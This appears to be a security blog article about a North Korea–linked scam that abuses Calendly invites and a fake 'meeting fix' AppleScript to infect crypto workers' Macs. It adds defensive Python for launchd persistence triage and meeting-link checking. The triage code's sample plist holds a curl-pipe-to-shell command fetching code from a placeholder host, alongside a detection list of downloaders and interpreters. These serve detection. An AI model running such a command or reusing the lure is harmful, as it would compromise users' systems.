Cryptocurrency professionals should be on alert: attackers are using popular scheduling services such as Calendly as the front end of a targeted scam. Recent reports describe a campaign in which attackers impersonate established cryptocurrency investors, schedule a meeting through Calendly, and then talk the victim into running a script that installs malware on their macOS system.
The Calendly Con Explained
As reported by Krebs On Security, the scam works by posing as a legitimate investor and reaching out to people working in the cryptocurrency space, typically over Telegram. Once a rapport is established, the scammer requests a video call to discuss a potential investment.
The Case Study
Let’s delve into a real-life example to understand the inner workings of this scam. Meet Doug, a representative of a startup seeking investment for a new blockchain platform. Doug, active on Telegram, was approached by an individual claiming to be Ian Lee from Signum Capital, a well-established investment firm based in Singapore.
Expressing interest in funding Doug’s venture, “Lee” proposed scheduling a video call via Calendly. When the scheduled time arrived, the meeting link did not work. While “troubleshooting” the problem with “Lee” over Telegram, Doug was told to run a script that would fix the link; doing as instructed installed malware on his Mac.
The file Doug ran was a simple AppleScript (.scpt) whose job was to download and execute a trojan built for macOS. Doug responded as many people would, by backing up his documents, changing his passwords, and reinstalling macOS, but because he did this before anyone had captured the script or a disk image, the malware itself could not be analyzed. Two points for anyone in the same position: preserve the script, whatever it downloaded, and any persistence entries (or a full image) before wiping, and change passwords from a separate, clean device rather than from the compromised one.
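As an added example (not part of the report or of Doug’s story), here is a small Python triage script of the kind a responder would run before reinstalling: it reads launchd job plists from the standard macOS persistence directories, flags jobs whose command line runs a script interpreter such as osascript or a download piped to a shell, and hashes the raw file so the artifact is pinned down. The directory list, the heuristic list of interpreter names, and the three sample plists are assumptions constructed for this example; none of them are indicators taken from the report.

```python
"""Added example: record suspicious launchd persistence entries before a
compromised Mac is wiped. Heuristics and sample plists are assumptions."""
from __future__ import annotations

import hashlib
import os
import plistlib
import sys
from pathlib import Path
from typing import Optional

# Interpreters/downloaders a script-based dropper commonly relies on for
# persistence. An assumed heuristic for this example, not an indicator list.
SUSPECT_BINARIES = {"osascript", "curl", "wget", "sh", "bash", "zsh", "python", "python3"}

# launchd locations walked when the script is run with --live on a real Mac.
PERSISTENCE_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]


def load_job(data: bytes) -> Optional[dict]:
    """Parse a launchd plist; None when the bytes are not a well-formed job."""
    try:
        job = plistlib.loads(data)
    except Exception:  # truncated, binary junk, or not a plist at all
        return None
    return job if isinstance(job, dict) else None


def job_argv(job: dict) -> list[str]:
    """Command line launchd would execute for this job ([] if none)."""
    args = job.get("ProgramArguments")
    if isinstance(args, list) and all(isinstance(a, str) for a in args):
        return args
    prog = job.get("Program")
    return [prog] if isinstance(prog, str) else []


def is_suspicious(argv: list[str]) -> bool:
    """True when the job runs an interpreter/downloader directly, or its
    arguments carry a URL or a pipe-to-shell pattern."""
    if not argv:
        return False
    if os.path.basename(argv[0]) in SUSPECT_BINARIES:
        return True
    joined = " ".join(argv)
    return any(m in joined for m in ("http://", "https://", "| sh", "| bash"))


def triage(plists: dict[str, bytes]) -> list[dict]:
    """Given {path: raw plist bytes}, return a record per suspicious job,
    including sha256 of the raw file so the evidence can be referenced later."""
    findings = []
    for path, data in sorted(plists.items()):
        job = load_job(data)
        if job is None:
            continue
        argv = job_argv(job)
        if is_suspicious(argv):
            findings.append({"path": path, "label": job.get("Label", ""),
                             "argv": argv, "sha256": hashlib.sha256(data).hexdigest()})
    return findings


def collect_from_disk() -> dict[str, bytes]:
    """Read every .plist under the launchd directories (macOS only)."""
    plists: dict[str, bytes] = {}
    for d in PERSISTENCE_DIRS:
        if d.is_dir():
            for p in d.glob("*.plist"):
                try:
                    plists[str(p)] = p.read_bytes()
                except OSError:
                    pass
    return plists


# Constructed sample plists standing in for files found on a victim's Mac.
_HEAD = b'<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0"><dict>\n'
SAMPLE_PLISTS = {
    "~/Library/LaunchAgents/com.example.backup.plist": _HEAD + b"""
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string><string>--daily</string></array>
<key>RunAtLoad</key><true/></dict></plist>""",
    "~/Library/LaunchAgents/com.example.meetingfix.plist": _HEAD + b"""
<key>Label</key><string>com.example.meetingfix</string>
<key>ProgramArguments</key><array><string>/usr/bin/osascript</string>
<string>/Users/victim/Library/Application Support/.meet/fix.scpt</string></array>
<key>RunAtLoad</key><true/></dict></plist>""",
    "/Library/LaunchDaemons/com.example.update.plist": _HEAD + b"""
<key>Label</key><string>com.example.update</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>curl -fsSL https://update.example.invalid/p | sh</string></array>
<key>StartInterval</key><integer>600</integer></dict></plist>""",
}

if __name__ == "__main__":
    source = collect_from_disk() if "--live" in sys.argv else SAMPLE_PLISTS
    for f in triage(source):
        print(f"{f['path']}\n  label={f['label']} sha256={f['sha256'][:16]}...\n  argv={f['argv']}")
```

Run with `--live` on the affected Mac to walk the real directories; without it the constructed samples are used. The flagged plists, the script they point at, and whatever that script downloaded are what to copy off the machine before reinstalling; a RunAtLoad agent will otherwise keep executing on every login until the wipe, and once the wipe happens the analysis opportunity is gone.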
macOS Malware Evolving
Researchers have linked the campaign to North Korean state-sponsored hackers, specifically BlueNoroff, a subgroup of the Lazarus Group. The lure abuses Calendly’s “Add Custom Link” feature: an organizer can set any URL as the meeting location, so an invitation carries Calendly’s branding while the join link points wherever the attacker chooses, which makes it a convenient delivery vehicle for phishing aimed at cryptocurrency projects.
macOS has historically seen far less malware than Windows, but that gap is closing. Information-stealing trojans built for macOS have multiplied recently, and Mac users, particularly those handling cryptocurrency, need to treat their machines as targets and defend them accordingly.
Protecting yourself from cryptocurrency scams takes more than one control. Treat unsolicited contact with skepticism, even when it comes with the name of a real firm, and verify the person through a channel you look up independently (the firm’s published contact details, not the Telegram handle that approached you). Check where a meeting link actually points before opening it, and never run a script, installer, or “fix” that a counterpart sends you to get a meeting working: the broken link is the pretext, and the script is the payload. Keep macOS and your applications updated so that known bugs are not an easy second route in.
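Putting “check where a meeting link actually points” into something checkable, as an added example that is not from the original article: the Python below validates a meeting link before it is opened. It rejects non-https URLs, the userinfo trick that hides the real host after an “@”, explicit ports, punycode lookalike domains, and any host that is not the trusted provider or a genuine subdomain of it (so `calendly.com.something.invalid` fails). Because Calendly’s custom-link field lets an organizer put any URL in an invitation, it is the destination host that has to be checked, not the Calendly branding around it. The provider allowlist and the sample links are assumptions constructed for this example.

```python
"""Added example: vet a meeting link before opening it. The provider
allowlist and the sample links are assumptions for the example."""
from __future__ import annotations

from urllib.parse import urlsplit

# Providers a legitimate invite is expected to land on. Assumed for this
# example; extend it to whatever your organization actually uses.
TRUSTED_MEETING_HOSTS = ("calendly.com", "zoom.us", "meet.google.com", "teams.microsoft.com")


def host_under(host: str, trusted: str) -> bool:
    """Exact match or a real subdomain: suffix match on a label boundary,
    so 'calendly.com.evil.invalid' does not pass for 'calendly.com'."""
    return host == trusted or host.endswith("." + trusted)


def check_meeting_link(url: str) -> tuple[bool, str]:
    """Return (ok, reason). Only plain https to a trusted host passes."""
    try:
        parts = urlsplit(url.strip())
        port = parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme != "https":
        return False, f"scheme {parts.scheme!r}, expected https"
    if parts.username is not None or parts.password is not None:
        return False, "credentials before '@': the real host is hidden after it"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "no host"
    if port is not None:
        return False, f"explicit port {port}"
    if not host.isascii() or host.startswith("xn--") or ".xn--" in host:
        return False, "internationalized host: possible homoglyph domain"
    for trusted in TRUSTED_MEETING_HOSTS:
        if host_under(host, trusted):
            return True, f"{host} is under {trusted}"
    return False, f"{host} is not a known meeting provider"


def review_links(urls: list[str]) -> dict[str, tuple[bool, str]]:
    """Vet a batch of links, e.g. every URL pulled out of an invitation."""
    return {u: check_meeting_link(u) for u in urls}


# Constructed invite links of the kind a custom-link field might carry.
SAMPLE_LINKS = [
    "https://calendly.com/acme-capital/intro-call",          # genuine
    "https://us02web.zoom.us/j/1234567890",                   # genuine subdomain
    "https://calendly.com.meet-fix.invalid/join",             # suffix lookalike
    "https://calendly.com@meet-fix.invalid/join",             # userinfo trick
    "http://calendly.com/acme-capital/intro-call",            # downgrade
    "https://xn--calendy-9ya.invalid/join",                   # punycode lookalike
    "https://calendly.com:8443/acme-capital/intro-call",      # odd port
]

if __name__ == "__main__":
    for link, (ok, why) in review_links(SAMPLE_LINKS).items():
        print(f"{'OK  ' if ok else 'WARN'} {link}\n     {why}")
```

The checks are deliberately strict: a real invite from a major provider has no reason to use a port, an “@”, or a punycode name, so each of those is grounds to stop and confirm the meeting through a channel you control rather than to keep clicking.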